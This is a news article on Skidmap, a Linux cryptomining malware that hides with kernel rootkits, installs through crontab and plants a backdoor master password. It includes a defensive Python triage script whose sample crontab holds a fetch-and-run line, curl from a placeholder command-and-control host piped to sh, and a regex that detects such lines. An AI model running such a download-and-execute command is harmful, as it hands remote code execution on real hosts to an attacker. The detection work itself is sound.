A new Linux malware, Skidmap, uses rootkit capabilities to mine cryptocurrency undetected, as reported by two threat analysts, Augusto Remillano II and Jakub Urbanec.
In a post published on September 16, the two analysts indicated that they had discovered a new Linux malware that keeps cryptocurrency mining operations hidden and also gives attackers easy access to the infected systems. According to the post, the malware hides its mining activity by loading malicious kernel modules.
How it Works
Skidmap loads malicious kernel modules to hide its cryptocurrency mining activities. To that end, it reports fake network traffic and CPU usage figures so the mining does not show up in the usual statistics. The malware installs itself through crontab, after which it downloads multiple binaries to the infected device. These binaries weaken the device's security settings, and the malware provides backdoor access to the system.
Besides mining cryptocurrency, it also sets up a secret master password on the infected system. That password gives the attackers the same complete system access the system would grant a legitimate registered user.
According to the analysis by Remillano and Urbanec, the malware loads kernel-mode rootkits, which “are not only more difficult to detect compared to their user-mode counterparts – but attackers can also use them to gain unfettered access to the affected system.”
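Two defender-side triage checks for the behaviour described above, added here as an illustration and not part of the original article or of the analysts' work: flagging crontab entries that download and execute remote content (the installation route named above) and spotting a loaded kernel module that has been unlinked from the list lsmod reads (the LKM rootkit behaviour). It assumes the caller has already collected the crontab text, the contents of /proc/modules and the names of the /sys/module directories that contain an initstate file; all sample input below is constructed.

```python
import re

# Cron commands that fetch remote content and pipe it to a shell, or fetch it
# and then run it after a command separator (the download-and-execute pattern).
DOWNLOAD_EXEC_RE = re.compile(
    r"\b(?:curl|wget)\b[^|;&]*(?:\|\s*(?:ba|da)?sh\b|[;&]{1,2}\s*(?:chmod|sh|bash|/))"
)


def suspicious_cron_entries(crontab_text: str) -> list[str]:
    """Return crontab lines whose command downloads and executes remote content."""
    hits = []
    for raw in crontab_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if DOWNLOAD_EXEC_RE.search(line):
            hits.append(line)
    return hits


def hidden_modules(proc_modules_text: str, sysfs_loaded: set[str]) -> set[str]:
    """Module names present under /sys/module (only directories carrying an
    'initstate' file, i.e. genuinely loaded modules) but absent from /proc/modules.
    lsmod reads /proc/modules, so a module that unlinks itself from the kernel's
    module list vanishes from lsmod while its sysfs directory often remains."""
    listed = {ln.split()[0] for ln in proc_modules_text.splitlines() if ln.strip()}
    return sysfs_loaded - listed


def triage(crontab_text: str, proc_modules_text: str, sysfs_loaded: set[str]) -> dict:
    """Run both checks and return one report."""
    return {
        "cron": suspicious_cron_entries(crontab_text),
        "hidden_modules": sorted(hidden_modules(proc_modules_text, sysfs_loaded)),
    }


# Constructed sample input; the host, script and module names are placeholders.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
*/10 * * * * curl -fsSL http://c2.example.invalid/update.sh | sh
"""
SAMPLE_PROC_MODULES = """\
ext4 737280 1 - Live 0x0000000000000000
xfs 1458176 0 - Live 0x0000000000000000
"""
SAMPLE_SYSFS_LOADED = {"ext4", "xfs", "hidden_hypothetical"}

if __name__ == "__main__":
    print(triage(SAMPLE_CRONTAB, SAMPLE_PROC_MODULES, SAMPLE_SYSFS_LOADED))
```

A module missing from lsmod but present in sysfs is a lead, not proof; confirm against the distribution's module set and an offline inspection of the disk before acting on it.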
What Makes Skidmap a Major Threat?
Analysts indicate that this malware employs a fairly advanced method of staying undetected. Its use of LKM (loadable kernel module) rootkits makes it harder to remove than other malware designed to perform similar activities.
Skidmap also comes with several ways to regain access to affected machines. This diversity makes it difficult to clean a device and keep it clean: even after the machine has been cleaned, the malware re-infects the system through one of its remaining access routes.
Cryptojacking is not a new concept in the industry, and cryptocurrency mining malware remains a prevalent threat. The McAfee Labs Threats Report released in early August recorded a rise in cryptojacking cases and malware attacks, a 29% increase as of the time of the document's release. These threats no longer focus only on Windows but also target Macintosh systems, which was not initially the case.
Recently, authorities in France reported that they had shut down a cryptocurrency mining botnet (a crypto-jacking virus) that had infected more than 850,000 computers across 100 countries.